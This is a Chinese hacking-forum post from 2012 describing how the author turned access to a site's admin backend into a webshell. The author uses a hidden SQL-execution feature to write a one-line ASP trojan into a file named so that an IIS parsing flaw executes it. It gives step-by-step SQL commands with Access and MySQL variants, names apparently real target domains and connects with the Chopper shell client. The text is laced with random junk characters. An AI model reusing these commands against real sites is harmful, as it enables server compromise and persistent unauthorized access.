好不容易进了后台,发现啥上传啊。备份啊多木有。& ^1 Z& Q" ?5 R% `
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
# o' P( d! G% J( C- T- q文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,- k; J$ q4 v5 n2 A ?
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:0 H& v) k- |6 p
1.create table cmd (a varchar(50))
; `( A; \* s& @& C' \. Z2.insert into cmd (a) values (‘‘)) W1 q5 ?. _4 I
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd3 K3 ~# t* P- E; J' m$ K# ~3 n
(把表cmd的内容导出为物理路径的一个EXCEL文件)+ g; y( M5 ]2 z+ T g- v
4.drop table cmd$ b% O- }. U/ B! E
利用IIS的BUG成功拿到了WEBSHELL。0 Z6 d( C) j$ r3 A+ b
8 N' z, S# c. |- A+ h3 B直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话0 O# q) J) l! X0 D( L
; O, Q( x* O0 I4 N, o SQL语句意思解释: X0 |/ ]6 w2 l1 g) L
第一句
5 J3 H- v$ j' e: j" O/ f `5 W, W 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
& h H* A% j4 t3 a; w' a3 X, B: {0 c( ]
第二句
4 w+ u$ `# B/ P: Z 在表cmd的a字段插入一句话木马& X9 O2 w7 w s3 x0 v
第三句
4 `% N+ W: E# q0 {6 c 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件5 p* G6 \( r* Q$ i
+ W! P' |) Q& t8 m% b- K: Z- _ 第四句- C. B! P h5 [1 }8 g, s/ b5 }- a
删除建立的cmd表$ H K" l1 S- Q" Y1 A1 X
. P3 o6 Q5 Z! `! Z, I" W 以下内容为测试:, {8 [8 Y4 t" N( C1 W% V
Access利用后台SQL执行命令功能导出WebShell:
% b# C9 y8 X% q# Z8 D8 ] 这个更简单:
* Q6 x# E L8 }+ d: j [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]1 U( x, J9 d( |& z7 Q* f6 i; N4 @
或者
; A& b5 `# f. ]# l! o. \& [ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
) q* o5 @! Z4 b+ V# u6 z
# I: B. [9 S% _* H1 l& ^1 ? 后台有执行SQL语句功能(vote为已知表段)
% |! ]# M# \& ?- t: V" G% L6 c 希望对大家有所帮助拿shell的又一个思路
( Y8 `" A2 Z. J" a9 g4 e0 c |
发表于 2012-9-13 17:53:58
收藏
支持
反对